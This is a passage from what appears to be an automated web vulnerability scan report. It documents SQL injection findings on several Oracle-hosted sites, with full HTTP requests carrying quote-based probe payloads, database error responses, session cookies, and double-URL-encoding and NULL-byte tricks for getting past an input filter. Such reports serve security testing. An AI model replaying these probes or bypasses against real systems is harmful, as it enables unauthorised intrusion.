GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:46:02 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.13. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The position3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the position3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss'&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:46:08 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss''&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:46:08 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.14. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [university parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The university parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the university parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss'&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:45:19 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss''&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:45:19 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.15. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_arg_names parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The p_arg_names parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_arg_names parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379'&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names=77163605215299380&p_t03=&p_arg_names=77163016753299379&p_t04=&p_arg_names=77162817151299379&p_t05=&p_arg_names=77163813569299380&p_arg_names=77
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 5392
Date: Mon, 17 Oct 2011 01:39:46 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:39:48 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<td>ORA-06502: PL/SQL: numeric or value error: character to number conversion error</td>
...[SNIP]...

1.16. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_flow_step_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The p_flow_step_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_flow_step_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1'&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names=77163605215299380&p_t03=&p_arg
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 518
Date: Mon, 17 Oct 2011 01:39:37 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:39:39 GMT; path=/

<table summary=""><tr><td><img src="/i/error.gif" border="0" /></td><td>Error</td><td>ERR-1412 Unable to resolve page alias (1').</td></tr><tr><td></td><td></td><td>ORA-06502: PL/SQL: numeric or value error: character to number conversion error
ORA-06502: PL/SQL: numeric or value error: character to number conversion error</td>
...[SNIP]...

1.17. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/wcm/sitestudio/wcm.toggle.js

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1%2527
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:26:41 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "70014-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=10;ecid=49477574165541145,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1%2527%2527
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:32 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:27 GMT
ETag: "aa3e12-38fb-4af51f9eb45c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=73;ecid=49941499352986214,0:1)
Content-Length: 14587

/////////////////////////////////////////////////////////////////////////////
//
// Project : Web Content Management JavaScript Library (WCM)
//
// FileName : wcm.toggle.js
// FileType : Jav
...[SNIP]...

1.18. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [gpw_e24 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/wcm/sitestudio/wcm.toggle.js

Issue detail

The gpw_e24 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gpw_e24 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%00'; 